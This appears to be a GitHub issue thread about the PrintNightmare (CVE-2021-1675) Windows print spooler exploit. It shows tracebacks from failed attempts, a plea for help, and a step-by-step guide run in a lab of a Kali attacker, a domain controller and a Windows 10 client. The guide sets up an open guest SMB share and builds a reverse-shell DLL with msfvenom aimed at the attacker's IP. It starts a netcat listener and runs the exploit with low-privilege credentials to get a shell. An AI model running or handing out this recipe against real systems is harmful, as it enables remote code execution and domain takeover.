File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1358, in write
if ans.isValidAnswer(STATUS_SUCCESS):
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3structs.py", line 454, in isValidAnswer
raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/home/king/CVE-2021-1675/CVE-2021-1675.py", line 190, in
main(dce, pDriverPath, options.share)
File "/home/king/CVE-2021-1675/CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 856, in request
self.call(request.opnum, request, uuid)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 845, in call
return self.send(DCERPC_RawCall(function, body.getData(), uuid))
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1298, in send
self._transport_send(data)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1235, in _transport_send
self._transport.send(rpc_packet.get_packet(), forceWriteAndx = forceWriteAndx, forceRecv = forceRecv)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 535, in send
self.__smb_connection.writeFile(self.__tid, self.__handle, data)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 570, in writeFile
raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)

PLEASE HELP ME！！！！

sudo python3 CVE-2021-1675.py test.local/chen:[email protected] '\192.168.121.128\smb\reverse.dll'
[] Connecting to ncacn_np:192.168.121.136[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_ce3301b66255a0fb\Amd64\UNIDRV.DLL
[] Executing ??\UNC\192.168.121.128\smb\reverse.dll
[] Try 1...
[] Stage0: 0
[] Try 2...
[] Stage0: 0
[*] Try 3...
Traceback (most recent call last):
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 597, in readFile
bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1975, in read_andx
return self.read(tid, fid, offset, max_size, wait_answer)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1312, in read
if ans.isValidAnswer(STATUS_SUCCESS):
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3structs.py", line 454, in isValidAnswer
raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_PIPE_BROKEN(The pipe operation has failed because the other end of the pipe has been closed.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/home/kali/CVE-2021-1675.py", line 192, in
main(dce, pDriverPath, options.share)
File "/home/kali/CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 857, in request
answer = self.recv()
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1308, in recv
response_data = self._transport.recv(forceRecv, count=MSRPCRespHeader._SIZE)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 547, in recv
return self.__smb_connection.readFile(self.__tid, self.__handle)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 603, in readFile
raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_BROKEN(The pipe operation has failed because the other end of the pipe has been closed.)

This is how I was able to reproduce the exploit in a virtual environment:

1. The best practice is to create Python virtual Environment

   • python3 -m venv PrintNightmare
   • source PrintNightmare/bin/activate

2. clone the repo and install the custom Impacket version:

• git clone https://github.com/cube0x0/CVE-2021-1675.git
• git clone https://github.com/cube0x0/impacket
• cd impacket
• python3 ./setup.py install

3. Set up SMB share

• copy the original smb.conf file and create a backup file
  cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
• now on the smb.conf change to this new configuration File

[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445

[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = nobody

• Spin up SMB share:

  impacket-smbserver smb /tmp/

In case you have some problems with the SMB try to use build-in SMBD service
service smbd start

4. Payload Creation:

• Create Reverse shell Payload as a DLL

  msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<YOUR IP> LPORT=<PORT TO LISTEN> -f dll -o /tmp/rev.dll

5. Windows Environment:

• you need to create a dc with an active directory.
• create a low privilege user
• create a windows 10 as the client join him in the domain
• login into the win10 with the new user

6. Set up a listener

• nc -lnvp 9001

7. Run the Exploit

• python3 CVE-2021-1675.py <FQDN>/<USER_Name>:<PASSWORD>@<DC IP> '\\<ATTACKER_IP>\smb\rev.dll'

8. ENJOY your SHELL =)

Machines:

• Attacker: kali Linux
• DC: Server 2016
• Client: win10

I'm trying to run on Standalone windows10, but did'nt work.